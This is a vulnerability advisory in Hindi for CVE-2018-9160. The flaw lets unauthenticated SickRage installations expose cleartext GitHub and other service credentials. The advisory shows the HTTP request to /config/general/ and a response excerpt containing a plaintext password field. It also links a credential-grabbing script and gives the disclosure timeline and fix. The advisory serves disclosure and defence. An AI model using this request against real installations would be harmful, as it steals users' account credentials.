
CVE-2018-9160
शोषण शीर्षक: SickRage में HTTP प्रतिक्रिया में स्पष्ट पाठ क्रेडेंशियल्स
दिनांक: 2018-04-01
शोषण लेखक: Sven Fassbender
संपर्क: https://twitter.com/mezdanak
विक्रेता होमपेज: https://sickrage.github.io
सॉफ्टवेयर लिंक: https://github.com/SickRage/SickRage
संस्करण: < v2018.03.09-1
CVE : CVE-2018-9160
श्रेणी: webapps
"SickRage एक स्वचालित वीडियो लाइब्रेरी मैनेजर है टीवी शो के लिए।
यह आपके पसंदीदा शो के नए एपिसोड पर नज़र रखता है, और जब वे पोस्ट होते हैं तो यह अपना जादू करता है:
स्वचालित टोरेंट/nzb खोज, डाउनलोडिंग, और आपके इच्छित गुणवत्ता में प्रसंस्करण।" --https://sickrage.github.io से उद्धरण
SickRage HTTP प्रतिक्रियाओं में उदाहरण के लिए GitHub, AniDB, Kodi, Plex आदि के स्पष्ट पाठ क्रेडेंशियल्स लौटाता है।
पूर्वावश्यकता यह है कि उपयोगकर्ता ने अपने SickRage इंस्टॉलेशन के लिए उपयोगकर्ता नाम और पासवर्ड सेट नहीं किया। (लागू नहीं, डिफ़ॉल्ट)
HTTP अनुरोध:
GET /config/general/ HTTP/1.1
Host: 192.168.1.13:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.13:8081/config/backuprestore/
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
HTTP प्रतिक्रिया:
HTTP/1.1 200 OK
Content-Length: 113397
Vary: Accept-Encoding
Server: TornadoServer/4.5.1
Etag: "e5c29fe99abcd01731bec1afec0e618195f1ae37"
Date: Fri, 02 Mar 2018 10:47:51 GMT
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html>
<html lang="nl_NL">
<head>
[...]
<input type="text" name="git_username" id="git_username" value="[email protected]" class="form-control input-sm input300" autocapitalize="off" autocomplete="no" />
[...]
<input type="password" name="git_password" id="git_password" value="supersecretpassword" class="form-control input-sm input300" autocomplete="no" autocapitalize="off" />
[...]
</div>
</body>
</html>
https://github.com/mechanico/sickrageWTF/blob/master/get_github_creds_sickrage.py
[2018-03-07] भेद्यता की खोज हुई
[2018-03-08] विक्रेता से संपर्क किया गया
[2018-03-08] विक्रेता ने उत्तर दिया
[2018-03-09] भेद्यता ठीक की गई। (https://github.com/SickRage/SickRage/compare/v2018.02.26-2...v2018.03.09-1)
SickRage इंस्टॉलेशन को v2018.03.09-1 या बाद के संस्करण में अपडेट करें।
वेब एप्लिकेशन तक पहुंच को उचित उपयोगकर्ता क्रेडेंशियल्स से सुरक्षित रखें।